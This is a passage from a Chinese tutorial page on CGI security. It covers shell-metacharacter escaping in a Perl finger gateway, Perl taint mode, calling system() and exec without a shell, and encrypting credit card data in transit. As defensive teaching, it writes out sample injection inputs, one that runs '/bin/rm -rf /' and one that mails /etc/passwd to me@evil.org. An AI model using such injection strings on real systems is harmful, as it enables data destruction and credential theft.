盾怪网教程:是一个免费提供流行杀毒软件教程、在线学习分享的学习平台!

CGI的安全

时间:2024/11/5作者:未知来源:盾怪网教程人气:

[摘要]`&\!#\(\)\[\]\:'"])/\\1/g; return @_; print &PrintHeader; if (&ReadParse(*i...
`&\$!#\(\)\[\]\:'"])/\\$1/g;
  return @_;
}
print &PrintHeader;
if (&ReadParse(*in)) {
  print "\n";
  print `/usr/bin/finger &escape_input($in)`;
  print "\n";
}
else {
  print " \n";
  print "\n";
  print "\n\n";
  print "Finger Gateway\n";
  print "\n";
  print "User@Host: \n";
  print "\n";
  print "\n";
  print " \n";
}

  这次,如果你使用前述相同的输入,将派生出一个shell,它将尝试这样执
行:

  /usr/bin/finger nobody@nowhere.org \: /bin/rm -rf /

  这样,那个恶意的企图将无法生效.它不再试图删除系统中所有的目录,而是
尝试finger用户nobody@nowhere.org,:,/bin/rm,-rf和 /。由于后面的字符
组合未必是你的系统中的用户,因此可能会返回一个错误。

  记住几个问题。首先,如果你的Web服务器正确的配置了(例如,以非root
身份运行),那么,删除文件系统中的所有内容的企图不会成功。(如果服务
器以root身份运行,那么潜在的危害将是不可估量的。千万不要这样做!)另外,
用户还假定rm命令在/bin目录中。他或她假定了rm在这个路径中。然而,所有
这些只是对大多数的Unix系统的乐观的假设,并不是完全适用的。在一个
chrooted系统环境中,这个目录中并没有rm命令。那么hacker的努力将是徒劳
的。从理论上说,通过安全防范和正确配置你的Web服务器,你可以将潜在的危
害降低到几乎为0,即使是书写了糟糕的脚本。

  然而,你没有理由在编写CGI程序时可以掉以轻心。事实上,大多数的Web环
境并不是chrooted的,仅仅是因为它禁止了很多人需要在Web服务器中需要的
灵活性。即使服务器不是以root身份运行,用户不能将文件系统中的文件全部
删除,一些人可以仅仅通过如下的输入,将/etc/passwd文件寄给me@evil.org
作为可能的攻击途径:

  nobody@nowhere.org ; /bin/mail me@evil.org < /etc/passwd

  我可以通过操纵这个漏洞来干很多事情,即使是在一个配置良好的环境中。
如果你在一个简单的CGI程序中容许一个漏洞从你的身边溜过,你怎么能肯定
你正确并安全的配置了你复杂的Unix系统和Web服务器?

  答案是你不能。你最好打赌弄清楚你的CGI程序是安全的。在shell中运行它
之前不轻易接受输入是很容易对付的事情,它还是CGI编程中最常见的问题之一。

  幸运的是,Perl拥有一个捕捉潜在感染的变量的很好的机制。如果你使用
taintperl而不是Perl(或者perl -T,如果你使用Perl 5),脚本将在潜在感染的
变量传递给shell命令处中止。这将帮助你在开始实际使用CGI程序时捕捉到所
有的潜在感染的变量的例子。

  注意到Perl拥有比C更多的派生shell的函数。这并不是显而易见的,即使是
对于中级的Perl程序员,在执行程序前向后标记派生出一个shell。这是高级
语言的风险抉择;因为你不是很明确地知道它做什么,所以你并不清楚一个函
数会产生怎样的安全漏洞。

  如果你避免了使用调用shell的函数,那么你不需要删除敏感的输入。在Perl
语言中,你可以通过使用system()或者exec()函数来封装每一个参数。例如,
如下的调用很安全的$input:

  system("/usr/ucb/finger",$input);

  然而,在你的finger gateway的情况下,这个特点是毫无用处的,因为你要
处理finger命令的输出,这个,除了你使用system函数外没有方法可以捕获。

  在C语言中,你也可以通过使用exec一类的函数来直接执行程序:exev(),
exec1(),execvp(),execlp(),和execle()。exec1()在C语言中等价于Perl中的
system()函数。你使用哪一个exec函数以及如何使之按你的需要执行:这些细
节已经超出了本书的范围。
3.安全处理

  我前面简要讨论的只是安全问题的一个方面。现在流行的CGI应用程序倾向于
收集信用卡信息。数据收集是CGI应用程序的一个简单的任务,但是敏感信息的
收集需要一个将信息从浏览器传送给服务器和CGI程序的安全途径。

  举个例子,假设我要通过Internet来销售书。我可能在浏览器上建立一个表
单,允许要购书的顾客通过表单提交它的个人信息和信用卡号码。受到这些信
息后,我会将它们存储到我的计算机作为商业记录。

  如果有人侵入我的商业计算机,那么他可能会访问存放顾客信息和信用卡号
码的机密数据。为了避免这种情况,我会审查我的计算机配置安全了,并确定
用来接受表单的CGI脚本不会被恶意的操纵。换句话说,我,作为计算机的系统
管理员和CGI程序员,要尽力控制住第一个问题:防止信息直接从我的计算机中
被窃取。

  然而,怎样防止当信息由客户端发往服务器过程中有人中途窃取呢?记住信
息怎样由Web服务器传送到CGI程序了吗?信息通过网络由浏览器先传送到服务
器,然后服务器将信息传送给CGI程序。这些信息可能在由客户机传送到服务器
时被中途窃取(如图2)。注意,为了保护信息使其不会被中途窃取,必须在客户
和服务器之间进行加密。当然,如果你的客户机不能识别的话,你不能执行特
定CGI的加密。

_______________ ______________

关键词:CGI的安全




Copyright © 2012-2018 盾怪网教程(http://www.dunguai.com) .All Rights Reserved 网站地图 友情链接

免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!

QQ:1006262270   邮箱:kfyvi376850063@126.com   手机版